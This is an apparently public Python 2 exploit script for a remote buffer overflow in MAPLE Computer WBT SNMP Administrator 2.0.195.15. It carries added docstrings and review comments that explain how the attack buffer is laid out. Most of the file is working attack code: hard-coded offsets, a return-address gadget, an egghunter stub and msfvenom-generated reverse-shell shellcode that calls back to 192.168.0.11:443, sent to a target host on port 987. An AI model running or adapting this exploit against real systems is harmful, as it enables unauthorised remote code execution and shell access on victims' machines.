# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)
#!/usr/bin/python
import sys
import socket
import random
import string
import struct
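def pattern_create(_type, _length):
    """Build a test buffer of `_length` characters selected by the spec `_type`.

    `_type` is a space-separated spec whose first word picks the generator:
      * "trash X"  -> the word X repeated `_length` times
      * "random"   -> `_length` random lowercase ASCII letters
      * "pattern"  -> the cyclic "Aa0Aa1Aa2..." sequence used to locate offsets
    Any other first word returns the literal string "Not Found"; callers compare
    against that string rather than catching an exception, so it is kept.

    Args:
        _type: generator spec, e.g. "trash A", "random", "pattern".
        _length: number of characters wanted; values <= 0 yield "".

    Returns:
        The generated str, or "Not Found" for an unknown generator.

    Raises:
        IndexError: for "trash" with no filler word after it.
    """
    words = _type.split(" ")
    kind = words[0]
    if kind == "trash":
        # str * n is already "" for n <= 0, so no extra guard is needed.
        return words[1] * _length
    if kind == "random":
        # string.ascii_lowercase exists on Python 2 and 3 (string.lowercase was
        # removed in 3). random is fine for fuzz filler, never for secrets.
        return ''.join(random.choice(string.ascii_lowercase) for _ in range(_length))
    if kind == "pattern":
        return _cyclic_pattern(_length)
    return "Not Found"


def _cyclic_pattern(length):
    """Return the first `length` characters of the cyclic "Aa0Aa1...Aa9Ab0..." sequence.

    Each 3-character group is (upper, lower, digit); after every complete group the
    digit advances and carries into the lowercase, then the uppercase position.
    The loop tests `<` rather than `!=` so a negative length terminates at once
    instead of growing the buffer forever.
    """
    if length <= 0:
        return ""
    parts = ['A', 'a', '0']
    chars = []
    while len(chars) < length:
        chars.append(parts[len(chars) % 3])
        if len(chars) % 3 == 0:
            # Advance the digit and carry into the letter positions.
            parts[2] = chr(ord(parts[2]) + 1)
            if parts[2] > '9':
                parts[2] = '0'
                parts[1] = chr(ord(parts[1]) + 1)
                if parts[1] > 'z':
                    parts[1] = 'a'
                    parts[0] = chr(ord(parts[0]) + 1)
                    if parts[0] > 'Z':
                        parts[0] = 'A'
    return ''.join(chars)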
def pwned(_host, _port, _payload):
    """Connect to _host:_port over TCP, send _payload plus a CRLF CRLF terminator, and print the first 1024 bytes received.

    Python 2 only (print statements, str payloads). Returns nothing; any socket
    error (refused connection, reset, timeout) propagates to the caller.
    """
    print "[*] Conectandose a {0}:{1}...".format(_host, _port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((_host, _port))
    print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
    # What goes on the wire is the caller's buffer followed by a blank line; the
    # length printed at the end therefore exceeds the one printed above by 4.
    _payload = "{0}\r\n\r\n".format(_payload)
    # send() may queue fewer bytes than given; its return value is ignored here.
    s.send(_payload)
    _data = s.recv(1024)
    # NOTE(review): these two lines are bare attribute references, not calls, so
    # shutdown() and close() never run and the socket is only released when the
    # object is garbage-collected.
    s.shutdown
    s.close
    print 'Recibido:', repr(_data)
    print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))
def main():
    """Assemble the overflow buffer for the hard-coded target and hand it to pwned().

    Buffer layout, in send order (lengths follow from the arithmetic below):
    'A' filler | 8-byte tag | shellcode | 32-byte egghunter | 'B' filler | 4-byte EIP.
    Filler + tag + shellcode are exactly _padding bytes; the EIP value lands at
    offset _offset_eip. Nothing is read from argv; edit the constants instead.
    Observable traits of one run: a single ~642 KB request, long single-byte runs,
    and the literal tag, which also appears inside the egghunter bytes.
    """
    _host = "192.168.0.12"
    _port = 987
    # Offset at which the saved return address is overwritten, and the size of the
    # region holding filler + tag + shellcode. Both are specific to the build named
    # in the header (Windows XP SP2 x86).
    _offset_eip = 642200
    _padding = 642144
    # Little-endian encoding of 0x5AD778C3; the inline comment calls it a `call ebx`
    # gadget, but which module it lives in is not recorded in this file.
    _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
    # 8-byte egg ("w00t" twice). The same four bytes \x77\x30\x30\x74 are embedded
    # in _egghunter below, so this literal is a usable signature for both.
    _tag = "w00tw00t"

    #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
    # Per the msfvenom line above: stage-1 of a reverse shell to 192.168.0.11:443,
    # alphanumeric-encoded. Opaque bytes; regenerate rather than edit by hand.
    _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
    "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
    "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
    "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
    "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
    "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
    "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
    "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
    "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
    "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
    "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
    "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
    "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
    "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
    "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
    "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
    "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
    "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
    "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
    "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
    "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
    "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
    "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
    "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
    "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
    "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
    "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
    "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
    "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
    "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
    "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
    "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
    "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
    "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
    "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
    "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
    "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
    "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
    "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
    "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
    "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
    "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
    "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
    "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
    "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
    "\x70\x73\x63\x69\x6f\x59\x45\x41\x41")

    # 32-byte egghunter stub. Its role (locating the tag in memory) is taken from
    # the header and the embedded "w00t" bytes; the stub itself is not analysed here.
    _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

    # Filler so that filler + tag + shellcode == _padding bytes. Were tag + shellcode
    # ever larger than _padding, the length would go negative and 'A' * n would be "".
    _inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
    _inject += _tag
    _inject += _shellcode
    # _inject is exactly _padding bytes long at this point; the hunter follows it.
    _inject += _egghunter
    # Pad up to _offset_eip: 642200 - 642144 - 32 = 24 bytes of 'B'.
    _inject += pattern_create("trash B", _offset_eip-len(_inject))
    _inject += _eip

    # Dumps the whole ~642 KB buffer (mostly filler) to stdout before sending it.
    print(_inject)
    pwned(_host,_port,_inject)
if __name__ == "__main__":
    # Script entry point; target, offsets and payload are all hard-coded in main().
    main()